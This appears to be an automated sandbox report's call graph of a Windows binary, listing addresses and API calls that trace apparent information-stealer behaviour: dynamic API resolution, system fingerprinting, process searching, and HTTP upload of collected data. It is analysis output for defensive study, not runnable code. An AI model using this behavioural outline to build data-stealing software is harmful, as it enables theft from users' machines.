• 35ffd0: string assembly (361570, 342e70); 362740 GetWindowsDirectoryA; 344c50; 358ca0 StrCmpCA.
• Collection routines, each reached through 341530 (8 API calls) and 3460d0 (80 API calls): 3581b0 (10), 357ee0 (lstrlen, lstrcpy, StrCmpCA x3), 358050 (lstrlen, lstrcpy, StrCmpCA, lstrlen, lstrcpy), 345640 (8), 357280 (1499), 3583e0 (7), 3424e0 (230), 3585b0 (47), 35c840 (70), 35d0f0 (118), 35d7b0 (103, __setmbcp_nolock), 35dfa0 (149), 35e500 (108), 35e720 (120), 35ecb0 (99), 35e9e0 (110), 35eb70 (108), 347bc0 (155), 3641e0 (91), 361660 (12).
• 361ea5: CloseHandle, ExitProcess.

Nodes without a resolved caller in the graph:
• 363130: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• 362c10: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA
• 3630a0: GetSystemPowerStatus; 3629a0: GetCurrentProcess, IsWow64Process
• 364480: OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy (the process search flagged above)
• 36749e: malloc, strlen; 369711: 9 API calls, __setmbcp
• 35abb2 (120 API calls), 34f639 (144), 3416b9 (200), 34bf39 (177), 354b29 (303), 3523a9 (298), 364e35 (9), 352499 (290), 34db99 (673), 358615 (47), 362880 (10), 363480 (6), 363280 (7), 358c88 (16), 34b309 (98), 354c77 (295)
26471->26472 26473 344a60 2 API calls 26472->26473 26474 3438cd 26473->26474 26475 344a60 2 API calls 26474->26475 26476 3438e3 26475->26476 26477 344a60 2 API calls 26476->26477 26478 3438f9 26477->26478 26479 344a60 2 API calls 26478->26479 26480 34390f 26479->26480 26481 344a60 2 API calls 26480->26481 26482 343928 26481->26482 26483 344a60 2 API calls 26482->26483 26484 34393e 26483->26484 26485 344a60 2 API calls 26484->26485 26486 343954 26485->26486 26487 344a60 2 API calls 26486->26487 26488 34396a 26487->26488 26489 344a60 2 API calls 26488->26489 26490 343980 26489->26490 26491 344a60 2 API calls 26490->26491 26492 343996 26491->26492 26493 344a60 2 API calls 26492->26493 26494 3439af 26493->26494 26495 344a60 2 API calls 26494->26495 26496 3439c5 26495->26496 26497 344a60 2 API calls 26496->26497 26498 3439db 26497->26498 26499 344a60 2 API calls 26498->26499 26500 3439f1 26499->26500 26501 344a60 2 API calls 26500->26501 26502 343a07 26501->26502 26503 344a60 2 API calls 26502->26503 26504 343a1d 26503->26504 26505 344a60 2 API calls 26504->26505 26506 343a36 26505->26506 26507 344a60 2 API calls 26506->26507 26508 343a4c 26507->26508 26509 344a60 2 API calls 26508->26509 26510 343a62 26509->26510 26511 344a60 2 API calls 26510->26511 26512 343a78 26511->26512 26513 344a60 2 API calls 26512->26513 26514 343a8e 26513->26514 26515 344a60 2 API calls 26514->26515 26516 343aa4 26515->26516 26517 344a60 2 API calls 26516->26517 26518 343abd 26517->26518 26519 344a60 2 API calls 26518->26519 26520 343ad3 26519->26520 26521 344a60 2 API calls 26520->26521 26522 343ae9 26521->26522 26523 344a60 2 API calls 26522->26523 26524 343aff 26523->26524 26525 344a60 2 API calls 26524->26525 26526 343b15 26525->26526 26527 344a60 2 API calls 26526->26527 26528 343b2b 26527->26528 26529 344a60 2 API calls 26528->26529 26530 343b44 26529->26530 26531 344a60 2 API calls 26530->26531 26532 343b5a 26531->26532 26533 344a60 2 API calls 26532->26533 26534 343b70 26533->26534 
26535 344a60 2 API calls 26534->26535 26536 343b86 26535->26536 26537 344a60 2 API calls 26536->26537 26538 343b9c 26537->26538 26539 344a60 2 API calls 26538->26539 26540 343bb2 26539->26540 26541 344a60 2 API calls 26540->26541 26542 343bcb 26541->26542 26543 344a60 2 API calls 26542->26543 26544 343be1 26543->26544 26545 344a60 2 API calls 26544->26545 26546 343bf7 26545->26546 26547 344a60 2 API calls 26546->26547 26548 343c0d 26547->26548 26549 344a60 2 API calls 26548->26549 26550 343c23 26549->26550 26551 344a60 2 API calls 26550->26551 26552 343c39 26551->26552 26553 344a60 2 API calls 26552->26553 26554 343c52 26553->26554 26555 344a60 2 API calls 26554->26555 26556 343c68 26555->26556 26557 344a60 2 API calls 26556->26557 26558 343c7e 26557->26558 26559 344a60 2 API calls 26558->26559 26560 343c94 26559->26560 26561 344a60 2 API calls 26560->26561 26562 343caa 26561->26562 26563 344a60 2 API calls 26562->26563 26564 343cc0 26563->26564 26565 344a60 2 API calls 26564->26565 26566 343cd9 26565->26566 26567 344a60 2 API calls 26566->26567 26568 343cef 26567->26568 26569 344a60 2 API calls 26568->26569 26570 343d05 26569->26570 26571 344a60 2 API calls 26570->26571 26572 343d1b 26571->26572 26573 344a60 2 API calls 26572->26573 26574 343d31 26573->26574 26575 344a60 2 API calls 26574->26575 26576 343d47 26575->26576 26577 344a60 2 API calls 26576->26577 26578 343d60 26577->26578 26579 344a60 2 API calls 26578->26579 26580 343d76 26579->26580 26581 344a60 2 API calls 26580->26581 26582 343d8c 26581->26582 26583 344a60 2 API calls 26582->26583 26584 343da2 26583->26584 26585 344a60 2 API calls 26584->26585 26586 343db8 26585->26586 26587 344a60 2 API calls 26586->26587 26588 343dce 26587->26588 26589 344a60 2 API calls 26588->26589 26590 343de7 26589->26590 26591 344a60 2 API calls 26590->26591 26592 343dfd 26591->26592 26593 344a60 2 API calls 26592->26593 26594 343e13 26593->26594 26595 344a60 2 API calls 26594->26595 26596 343e29 26595->26596 26597 344a60 2 
API calls 26596->26597 26598 343e3f 26597->26598 26599 344a60 2 API calls 26598->26599 26600 343e55 26599->26600 26601 344a60 2 API calls 26600->26601 26602 343e6e 26601->26602 26603 344a60 2 API calls 26602->26603 26604 343e84 26603->26604 26605 344a60 2 API calls 26604->26605 26606 343e9a 26605->26606 26607 344a60 2 API calls 26606->26607 26608 343eb0 26607->26608 26609 344a60 2 API calls 26608->26609 26610 343ec6 26609->26610 26611 344a60 2 API calls 26610->26611 26612 343edc 26611->26612 26613 344a60 2 API calls 26612->26613 26614 343ef5 26613->26614 26615 344a60 2 API calls 26614->26615 26616 343f0b 26615->26616 26617 344a60 2 API calls 26616->26617 26618 343f21 26617->26618 26619 344a60 2 API calls 26618->26619 26620 343f37 26619->26620 26621 344a60 2 API calls 26620->26621 26622 343f4d 26621->26622 26623 344a60 2 API calls 26622->26623 26624 343f63 26623->26624 26625 344a60 2 API calls 26624->26625 26626 343f7c 26625->26626 26627 344a60 2 API calls 26626->26627 26628 343f92 26627->26628 26629 344a60 2 API calls 26628->26629 26630 343fa8 26629->26630 26631 344a60 2 API calls 26630->26631 26632 343fbe 26631->26632 26633 344a60 2 API calls 26632->26633 26634 343fd4 26633->26634 26635 344a60 2 API calls 26634->26635 26636 343fea 26635->26636 26637 344a60 2 API calls 26636->26637 26638 344003 26637->26638 26639 344a60 2 API calls 26638->26639 26640 344019 26639->26640 26641 344a60 2 API calls 26640->26641 26642 34402f 26641->26642 26643 344a60 2 API calls 26642->26643 26644 344045 26643->26644 26645 344a60 2 API calls 26644->26645 26646 34405b 26645->26646 26647 344a60 2 API calls 26646->26647 26648 344071 26647->26648 26649 344a60 2 API calls 26648->26649 26650 34408a 26649->26650 26651 344a60 2 API calls 26650->26651 26652 3440a0 26651->26652 26653 344a60 2 API calls 26652->26653 26654 3440b6 26653->26654 26655 344a60 2 API calls 26654->26655 26656 3440cc 26655->26656 26657 344a60 2 API calls 26656->26657 26658 3440e2 26657->26658 26659 344a60 2 API calls 
26658->26659 26660 3440f8 26659->26660 26661 344a60 2 API calls 26660->26661 26662 344111 26661->26662 26663 344a60 2 API calls 26662->26663 26664 344127 26663->26664 26665 344a60 2 API calls 26664->26665 26666 34413d 26665->26666 26667 344a60 2 API calls 26666->26667 26668 344153 26667->26668 26669 344a60 2 API calls 26668->26669 26670 344169 26669->26670 26671 344a60 2 API calls 26670->26671 26672 34417f 26671->26672 26673 344a60 2 API calls 26672->26673 26674 344198 26673->26674 26675 344a60 2 API calls 26674->26675 26676 3441ae 26675->26676 26677 344a60 2 API calls 26676->26677 26678 3441c4 26677->26678 26679 344a60 2 API calls 26678->26679 26680 3441da 26679->26680 26681 344a60 2 API calls 26680->26681 26682 3441f0 26681->26682 26683 344a60 2 API calls 26682->26683 26684 344206 26683->26684 26685 344a60 2 API calls 26684->26685 26686 34421f 26685->26686 26687 344a60 2 API calls 26686->26687 26688 344235 26687->26688 26689 344a60 2 API calls 26688->26689 26690 34424b 26689->26690 26691 344a60 2 API calls 26690->26691 26692 344261 26691->26692 26693 344a60 2 API calls 26692->26693 26694 344277 26693->26694 26695 344a60 2 API calls 26694->26695 26696 34428d 26695->26696 26697 344a60 2 API calls 26696->26697 26698 3442a6 26697->26698 26699 344a60 2 API calls 26698->26699 26700 3442bc 26699->26700 26701 344a60 2 API calls 26700->26701 26702 3442d2 26701->26702 26703 344a60 2 API calls 26702->26703 26704 3442e8 26703->26704 26705 344a60 2 API calls 26704->26705 26706 3442fe 26705->26706 26707 344a60 2 API calls 26706->26707 26708 344314 26707->26708 26709 344a60 2 API calls 26708->26709 26710 34432d 26709->26710 26711 344a60 2 API calls 26710->26711 26712 344343 26711->26712 26713 344a60 2 API calls 26712->26713 26714 344359 26713->26714 26715 344a60 2 API calls 26714->26715 26716 34436f 26715->26716 26717 344a60 2 API calls 26716->26717 26718 344385 26717->26718 26719 344a60 2 API calls 26718->26719 26720 34439b 26719->26720 26721 344a60 2 API calls 26720->26721 
26722 3443b4 26721->26722 26723 344a60 2 API calls 26722->26723 26724 3443ca 26723->26724 26725 344a60 2 API calls 26724->26725 26726 3443e0 26725->26726 26727 344a60 2 API calls 26726->26727 26728 3443f6 26727->26728 26729 344a60 2 API calls 26728->26729 26730 34440c 26729->26730 26731 344a60 2 API calls 26730->26731 26732 344422 26731->26732 26733 344a60 2 API calls 26732->26733 26734 34443b 26733->26734 26735 344a60 2 API calls 26734->26735 26736 344451 26735->26736 26737 344a60 2 API calls 26736->26737 26738 344467 26737->26738 26739 344a60 2 API calls 26738->26739 26740 34447d 26739->26740 26741 344a60 2 API calls 26740->26741 26742 344493 26741->26742 26743 344a60 2 API calls 26742->26743 26744 3444a9 26743->26744 26745 344a60 2 API calls 26744->26745 26746 3444c2 26745->26746 26747 344a60 2 API calls 26746->26747 26748 3444d8 26747->26748 26749 344a60 2 API calls 26748->26749 26750 3444ee 26749->26750 26751 344a60 2 API calls 26750->26751 26752 344504 26751->26752 26753 344a60 2 API calls 26752->26753 26754 34451a 26753->26754 26755 344a60 2 API calls 26754->26755 26756 344530 26755->26756 26757 344a60 2 API calls 26756->26757 26758 344549 26757->26758 26759 344a60 2 API calls 26758->26759 26760 34455f 26759->26760 26761 344a60 2 API calls 26760->26761 26762 344575 26761->26762 26763 344a60 2 API calls 26762->26763 26764 34458b 26763->26764 26765 344a60 2 API calls 26764->26765 26766 3445a1 26765->26766 26767 344a60 2 API calls 26766->26767 26768 3445b7 26767->26768 26769 344a60 2 API calls 26768->26769 26770 3445d0 26769->26770 26771 344a60 2 API calls 26770->26771 26772 3445e6 26771->26772 26773 344a60 2 API calls 26772->26773 26774 3445fc 26773->26774 26775 344a60 2 API calls 26774->26775 26776 344612 26775->26776 26777 344a60 2 API calls 26776->26777 26778 344628 26777->26778 26779 344a60 2 API calls 26778->26779 26780 34463e 26779->26780 26781 344a60 2 API calls 26780->26781 26782 344657 26781->26782 26783 344a60 2 API calls 26782->26783 26784 34466d 
26783->26784 26785 344a60 2 API calls 26784->26785 26786 344683 26785->26786 26787 344a60 2 API calls 26786->26787 26788 344699 26787->26788 26789 344a60 2 API calls 26788->26789 26790 3446af 26789->26790 26791 344a60 2 API calls 26790->26791 26792 3446c5 26791->26792 26793 344a60 2 API calls 26792->26793 26794 3446de 26793->26794 26795 344a60 2 API calls 26794->26795 26796 3446f4 26795->26796 26797 344a60 2 API calls 26796->26797 26798 34470a 26797->26798 26799 344a60 2 API calls 26798->26799 26800 344720 26799->26800 26801 344a60 2 API calls 26800->26801 26802 344736 26801->26802 26803 344a60 2 API calls 26802->26803 26804 34474c 26803->26804 26805 344a60 2 API calls 26804->26805 26806 344765 26805->26806 26807 344a60 2 API calls 26806->26807 26808 34477b 26807->26808 26809 344a60 2 API calls 26808->26809 26810 344791 26809->26810 26811 344a60 2 API calls 26810->26811 26812 3447a7 26811->26812 26813 344a60 2 API calls 26812->26813 26814 3447bd 26813->26814 26815 344a60 2 API calls 26814->26815 26816 3447d3 26815->26816 26817 344a60 2 API calls 26816->26817 26818 3447ec 26817->26818 26819 344a60 2 API calls 26818->26819 26820 344802 26819->26820 26821 344a60 2 API calls 26820->26821 26822 344818 26821->26822 26823 344a60 2 API calls 26822->26823 26824 34482e 26823->26824 26825 344a60 2 API calls 26824->26825 26826 344844 26825->26826 26827 344a60 2 API calls 26826->26827 26828 34485a 26827->26828 26829 344a60 2 API calls 26828->26829 26830 344873 26829->26830 26831 344a60 2 API calls 26830->26831 26832 344889 26831->26832 26833 344a60 2 API calls 26832->26833 26834 34489f 26833->26834 26835 344a60 2 API calls 26834->26835 26836 3448b5 26835->26836 26837 344a60 2 API calls 26836->26837 26838 3448cb 26837->26838 26839 344a60 2 API calls 26838->26839 26840 3448e1 26839->26840 26841 344a60 2 API calls 26840->26841 26842 3448fa 26841->26842 26843 344a60 2 API calls 26842->26843 26844 344910 26843->26844 26845 344a60 2 API calls 26844->26845 26846 344926 26845->26846 
26847 344a60 2 API calls 26846->26847 26848 34493c 26847->26848 26849 344a60 2 API calls 26848->26849 26850 344952 26849->26850 26851 344a60 2 API calls 26850->26851 26852 344968 26851->26852 26853 344a60 2 API calls 26852->26853 26854 344981 26853->26854 26855 344a60 2 API calls 26854->26855 26856 344997 26855->26856 26857 344a60 2 API calls 26856->26857 26858 3449ad 26857->26858 26859 344a60 2 API calls 26858->26859 26860 3449c3 26859->26860 26861 344a60 2 API calls 26860->26861 26862 3449d9 26861->26862 26863 344a60 2 API calls 26862->26863 26864 3449ef 26863->26864 26865 344a60 2 API calls 26864->26865 26866 344a08 26865->26866 26867 344a60 2 API calls 26866->26867 26868 344a1e 26867->26868 26869 344a60 2 API calls 26868->26869 26870 344a34 26869->26870 26871 344a60 2 API calls 26870->26871 26872 344a4a 26871->26872 26873 3666e0 26872->26873 26874 366afe 8 API calls 26873->26874 26875 3666ed 43 API calls 26873->26875 26876 366b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26874->26876 26877 366c08 26874->26877 26875->26874 26876->26877 26878 366c15 8 API calls 26877->26878 26879 366cd2 26877->26879 26878->26879 26880 366d4f 26879->26880 26881 366cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26879->26881 26882 366d5c 6 API calls 26880->26882 26883 366de9 26880->26883 26881->26880 26882->26883 26884 366df6 12 API calls 26883->26884 26885 366f10 26883->26885 26884->26885 26886 366f8d 26885->26886 26887 366f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26885->26887 26888 366f96 GetProcAddress GetProcAddress 26886->26888 26889 366fc1 26886->26889 26887->26886 26888->26889 26890 366ff5 26889->26890 26891 366fca GetProcAddress GetProcAddress 26889->26891 26892 367002 10 API calls 26890->26892 26893 3670ed 26890->26893 26891->26890 26892->26893 26894 3670f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26893->26894 26895 367152 26893->26895 26894->26895 26896 
36716e 26895->26896 26897 36715b GetProcAddress 26895->26897 26898 367177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26896->26898 26899 36051f 26896->26899 26897->26896 26898->26899 26900 341530 26899->26900 27209 341610 26900->27209 26902 34153b 26903 341555 lstrcpy 26902->26903 26904 34155d 26902->26904 26903->26904 26905 341577 lstrcpy 26904->26905 26906 34157f 26904->26906 26905->26906 26907 341599 lstrcpy 26906->26907 26909 3415a1 26906->26909 26907->26909 26908 341605 26911 35f1b0 lstrlen 26908->26911 26909->26908 26910 3415fd lstrcpy 26909->26910 26910->26908 26912 35f1e4 26911->26912 26913 35f1f7 lstrlen 26912->26913 26914 35f1eb lstrcpy 26912->26914 26915 35f208 26913->26915 26914->26913 26916 35f20f lstrcpy 26915->26916 26917 35f21b lstrlen 26915->26917 26916->26917 26918 35f22c 26917->26918 26919 35f233 lstrcpy 26918->26919 26920 35f23f 26918->26920 26919->26920 26921 35f258 lstrcpy 26920->26921 26922 35f264 26920->26922 26921->26922 26923 35f286 lstrcpy 26922->26923 26924 35f292 26922->26924 26923->26924 26925 35f2ba lstrcpy 26924->26925 26926 35f2c6 26924->26926 26925->26926 26927 35f2ea lstrcpy 26926->26927 26979 35f300 26926->26979 26927->26979 26928 35f30c lstrlen 26928->26979 26929 35f4b9 lstrcpy 26929->26979 26930 35f3a1 lstrcpy 26930->26979 26931 35f3c5 lstrcpy 26931->26979 26932 35f4e8 lstrcpy 26976 35f4f0 26932->26976 26933 35efb0 35 API calls 26933->26976 26934 35f479 lstrcpy 26934->26979 26935 35f59c lstrcpy 26935->26976 26936 35f70f StrCmpCA 26941 35fe8e 26936->26941 26936->26979 26937 35f616 StrCmpCA 26937->26936 26937->26976 26938 35fa29 StrCmpCA 26949 35fe2b 26938->26949 26938->26979 26939 35f73e lstrlen 26939->26979 26940 35fd4d StrCmpCA 26944 35fd60 Sleep 26940->26944 26955 35fd75 26940->26955 26942 35fead lstrlen 26941->26942 26943 35fea5 lstrcpy 26941->26943 26948 35fec7 26942->26948 26943->26942 26944->26979 26945 35fa58 lstrlen 26945->26979 26946 35f64a lstrcpy 26946->26976 26947 341530 8 API calls 26947->26976 
26958 35fee7 lstrlen 26948->26958 26961 35fedf lstrcpy 26948->26961 26950 35fe4a lstrlen 26949->26950 26953 35fe42 lstrcpy 26949->26953 26957 35fe64 26950->26957 26951 35ee90 28 API calls 26951->26976 26952 35f89e lstrcpy 26952->26979 26953->26950 26954 35fd94 lstrlen 26968 35fdae 26954->26968 26955->26954 26959 35fd8c lstrcpy 26955->26959 26956 35f76f lstrcpy 26956->26979 26963 35fdce lstrlen 26957->26963 26965 35fe7c lstrcpy 26957->26965 26969 35ff01 26958->26969 26959->26954 26960 35fbb8 lstrcpy 26960->26979 26961->26958 26962 35fa89 lstrcpy 26962->26979 26981 35fde8 26963->26981 26964 35f791 lstrcpy 26964->26979 26965->26963 26967 35f8cd lstrcpy 26967->26976 26968->26963 26973 35fdc6 lstrcpy 26968->26973 26970 35ff21 26969->26970 26977 35ff19 lstrcpy 26969->26977 26978 341610 4 API calls 26970->26978 26971 35f698 lstrcpy 26971->26976 26972 35faab lstrcpy 26972->26979 26973->26963 26974 341530 8 API calls 26974->26979 26975 35fbe7 lstrcpy 26975->26976 26976->26933 26976->26935 26976->26937 26976->26938 26976->26940 26976->26946 26976->26947 26976->26951 26976->26971 26976->26979 26986 35f924 lstrcpy 26976->26986 26987 35f99e StrCmpCA 26976->26987 26989 35fc3e lstrcpy 26976->26989 26990 35fcb8 StrCmpCA 26976->26990 26991 35f9cb lstrcpy 26976->26991 26992 35fce9 lstrcpy 26976->26992 26993 35fa19 lstrcpy 26976->26993 26994 35fd3a lstrcpy 26976->26994 26977->26970 26995 35fe13 26978->26995 26979->26928 26979->26929 26979->26930 26979->26931 26979->26932 26979->26934 26979->26936 26979->26938 26979->26939 26979->26940 26979->26945 26979->26952 26979->26956 26979->26960 26979->26962 26979->26964 26979->26967 26979->26972 26979->26974 26979->26975 26979->26976 26980 35ee90 28 API calls 26979->26980 26985 35f7e2 lstrcpy 26979->26985 26988 35fafc lstrcpy 26979->26988 26980->26979 26982 35fe08 26981->26982 26983 35fe00 lstrcpy 26981->26983 26984 341610 4 API calls 26982->26984 26983->26982 26984->26995 26985->26979 26986->26976 26987->26938 26987->26976 26988->26979 
26989->26976 26990->26940 26990->26976 26991->26976 26992->26976 26993->26976 26994->26976 26995->26019 26997 362785 26996->26997 26998 36278c GetVolumeInformationA 26996->26998 26997->26998 26999 3627ec GetProcessHeap RtlAllocateHeap 26998->26999 27001 362826 wsprintfA 26999->27001 27002 362822 26999->27002 27001->27002 27219 3671e0 27002->27219 27006 344c70 27005->27006 27007 344c85 27006->27007 27008 344c7d lstrcpy 27006->27008 27223 344bc0 27007->27223 27008->27007 27010 344c90 27011 344ccc lstrcpy 27010->27011 27012 344cd8 27010->27012 27011->27012 27013 344cff lstrcpy 27012->27013 27014 344d0b 27012->27014 27013->27014 27015 344d2f lstrcpy 27014->27015 27016 344d3b 27014->27016 27015->27016 27017 344d6d lstrcpy 27016->27017 27018 344d79 27016->27018 27017->27018 27019 344da0 lstrcpy 27018->27019 27020 344dac InternetOpenA StrCmpCA 27018->27020 27019->27020 27021 344de0 27020->27021 27022 3454b8 InternetCloseHandle CryptStringToBinaryA 27021->27022 27227 363e70 27021->27227 27023 3454e8 LocalAlloc 27022->27023 27039 3455d8 27022->27039 27025 3454ff CryptStringToBinaryA 27023->27025 27023->27039 27026 345517 LocalFree 27025->27026 27027 345529 lstrlen 27025->27027 27026->27039 27028 34553d 27027->27028 27030 345557 lstrcpy 27028->27030 27031 345563 lstrlen 27028->27031 27029 344dfa 27032 344e23 lstrcpy lstrcat 27029->27032 27033 344e38 27029->27033 27030->27031 27035 34557d 27031->27035 27032->27033 27034 344e5a lstrcpy 27033->27034 27037 344e62 27033->27037 27034->27037 27036 34558f lstrcpy lstrcat 27035->27036 27040 3455a2 27035->27040 27036->27040 27038 344e71 lstrlen 27037->27038 27042 344e89 27038->27042 27039->26048 27041 3455d1 27040->27041 27043 3455c9 lstrcpy 27040->27043 27041->27039 27044 344e95 lstrcpy lstrcat 27042->27044 27045 344eac 27042->27045 27043->27041 27044->27045 27046 344ed5 27045->27046 27047 344ecd lstrcpy 27045->27047 27048 344edc lstrlen 27046->27048 27047->27046 27049 344ef2 27048->27049 27050 344efe lstrcpy lstrcat 27049->27050 
27051 344f15 27049->27051 27050->27051 27052 344f36 lstrcpy 27051->27052 27053 344f3e 27051->27053 27052->27053 27054 344f65 lstrcpy lstrcat 27053->27054 27055 344f7b 27053->27055 27054->27055 27056 344fa4 27055->27056 27057 344f9c lstrcpy 27055->27057 27058 344fab lstrlen 27056->27058 27057->27056 27059 344fc1 27058->27059 27060 344fcd lstrcpy lstrcat 27059->27060 27061 344fe4 27059->27061 27060->27061 27062 34500d 27061->27062 27063 345005 lstrcpy 27061->27063 27064 345014 lstrlen 27062->27064 27063->27062 27065 34502a 27064->27065 27066 345036 lstrcpy lstrcat 27065->27066 27067 34504d 27065->27067 27066->27067 27068 345079 27067->27068 27069 345071 lstrcpy 27067->27069 27070 345080 lstrlen 27068->27070 27069->27068 27071 34509b 27070->27071 27072 3450ac lstrcpy lstrcat 27071->27072 27073 3450bc 27071->27073 27072->27073 27074 3450da lstrcpy lstrcat 27073->27074 27075 3450ed 27073->27075 27074->27075 27076 34510b lstrcpy 27075->27076 27077 345113 27075->27077 27076->27077 27078 345121 InternetConnectA 27077->27078 27078->27022 27079 345150 HttpOpenRequestA 27078->27079 27080 3454b1 InternetCloseHandle 27079->27080 27081 34518b 27079->27081 27080->27022 27234 367310 lstrlen 27081->27234 27085 3451a4 27242 3672c0 27085->27242 27088 367280 lstrcpy 27089 3451c0 27088->27089 27090 367310 3 API calls 27089->27090 27091 3451d5 27090->27091 27092 367280 lstrcpy 27091->27092 27093 3451de 27092->27093 27094 367310 3 API calls 27093->27094 27095 3451f4 27094->27095 27096 367280 lstrcpy 27095->27096 27097 3451fd 27096->27097 27098 367310 3 API calls 27097->27098 27099 345213 27098->27099 27100 367280 lstrcpy 27099->27100 27101 34521c 27100->27101 27102 367310 3 API calls 27101->27102 27103 345231 27102->27103 27104 367280 lstrcpy 27103->27104 27105 34523a 27104->27105 27106 3672c0 2 API calls 27105->27106 27107 34524d 27106->27107 27108 367280 lstrcpy 27107->27108 27109 345256 27108->27109 27110 367310 3 API calls 27109->27110 27111 34526b 27110->27111 27112 367280 lstrcpy 
27111->27112 27113 345274 27112->27113 27114 367310 3 API calls 27113->27114 27115 345289 27114->27115 27116 367280 lstrcpy 27115->27116 27117 345292 27116->27117 27118 3672c0 2 API calls 27117->27118 27119 3452a5 27118->27119 27120 367280 lstrcpy 27119->27120 27121 3452ae 27120->27121 27122 367310 3 API calls 27121->27122 27123 3452c3 27122->27123 27124 367280 lstrcpy 27123->27124 27125 3452cc 27124->27125 27126 367310 3 API calls 27125->27126 27127 3452e2 27126->27127 27128 367280 lstrcpy 27127->27128 27129 3452eb 27128->27129 27130 367310 3 API calls 27129->27130 27131 345301 27130->27131 27132 367280 lstrcpy 27131->27132 27133 34530a 27132->27133 27134 367310 3 API calls 27133->27134 27135 34531f 27134->27135 27136 367280 lstrcpy 27135->27136 27137 345328 27136->27137 27138 3672c0 2 API calls 27137->27138 27139 34533b 27138->27139 27140 367280 lstrcpy 27139->27140 27141 345344 27140->27141 27142 345370 lstrcpy 27141->27142 27143 34537c 27141->27143 27142->27143 27144 3672c0 2 API calls 27143->27144 27145 34538a 27144->27145 27146 3672c0 2 API calls 27145->27146 27147 345397 27146->27147 27148 367280 lstrcpy 27147->27148 27149 3453a1 27148->27149 27150 3453b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27149->27150 27151 34549c InternetCloseHandle 27150->27151 27155 3453f2 27150->27155 27153 3454ae 27151->27153 27152 3453fd lstrlen 27152->27155 27153->27080 27154 34542e lstrcpy lstrcat 27154->27155 27155->27151 27155->27152 27155->27154 27156 345473 27155->27156 27157 34546b lstrcpy 27155->27157 27158 34547a InternetReadFile 27156->27158 27157->27156 27158->27151 27158->27155 27160 358cc6 ExitProcess 27159->27160 27175 358ccd 27159->27175 27161 358ee2 27161->26050 27162 358e56 StrCmpCA 27162->27175 27163 358d30 lstrlen 27163->27175 27164 358dbd StrCmpCA 27164->27175 27165 358ddd StrCmpCA 27165->27175 27166 358dfd StrCmpCA 27166->27175 27167 358e1d StrCmpCA 27167->27175 27168 358e3d StrCmpCA 27168->27175 27169 358d5a lstrlen 27169->27175 27170 358d84 
StrCmpCA 27170->27175 27171 358da4 StrCmpCA 27171->27175 27172 358d06 lstrlen 27172->27175 27173 358e6f StrCmpCA 27173->27175 27174 358e88 lstrlen 27174->27175 27175->27161 27175->27162 27175->27163 27175->27164 27175->27165 27175->27166 27175->27167 27175->27168 27175->27169 27175->27170 27175->27171 27175->27172 27175->27173 27175->27174 27176 358ebb lstrcpy 27175->27176 27176->27175 27177->26056 27178->26058 27179->26064 27180->26066 27181->26072 27182->26074 27183->26080 27184->26084 27185->26090 27186->26092 27187->26096 27188->26110 27189->26114 27190->26113 27191->26109 27192->26113 27193->26132 27194->26116 27195->26117 27196->26121 27197->26124 27198->26129 27199->26136 27200->26139 27201->26145 27202->26167 27203->26171 27204->26170 27205->26166 27206->26170 27207->26180 27210 34161f 27209->27210 27211 34162b lstrcpy 27210->27211 27212 341633 27210->27212 27211->27212 27213 34164d lstrcpy 27212->27213 27214 341655 27212->27214 27213->27214 27215 34166f lstrcpy 27214->27215 27217 341677 27214->27217 27215->27217 27216 341699 27216->26902 27217->27216 27218 341691 lstrcpy 27217->27218 27218->27216 27220 3671e6 27219->27220 27221 362860 27220->27221 27222 3671fc lstrcpy 27220->27222 27221->26045 27222->27221 27224 344bd0 27223->27224 27224->27224 27225 344bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27224->27225 27226 344c41 27225->27226 27226->27010 27228 363e83 27227->27228 27229 363e9f lstrcpy 27228->27229 27230 363eab 27228->27230 27229->27230 27231 363ed5 GetSystemTime 27230->27231 27232 363ecd lstrcpy 27230->27232 27233 363ef3 27231->27233 27232->27231 27233->27029 27235 36732d 27234->27235 27236 34519b 27235->27236 27237 36733d lstrcpy lstrcat 27235->27237 27238 367280 27236->27238 27237->27236 27239 36728c 27238->27239 27240 3672b4 27239->27240 27241 3672ac lstrcpy 27239->27241 27240->27085 27241->27240 27243 3672dc 27242->27243 27244 3451b7 27243->27244 27245 3672ed lstrcpy lstrcat 27243->27245 27244->27088 27245->27244 27275 
3631f0 GetSystemInfo wsprintfA 27265 35e0f9 140 API calls 27292 356b79 138 API calls 27253 348c79 strlen malloc strcpy_s 27283 35f2f8 93 API calls 27293 341b64 162 API calls 27304 34bbf9 90 API calls 27294 367310 lstrlen lstrcpy lstrcat strcpy_s 27270 362d60 11 API calls 27295 362b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27296 36a280 __CxxFrameHandler 27280 351269 408 API calls 27254 345869 57 API calls 27255 362853 lstrcpy 27266 362cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27272 353959 244 API calls 27276 3501d9 126 API calls 27298 358615 49 API calls 27267 363cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27305 3633c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27256 35e049 147 API calls 27306 358615 48 API calls
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00344C7F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344CD2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D05
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D35
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344D73
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00344DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
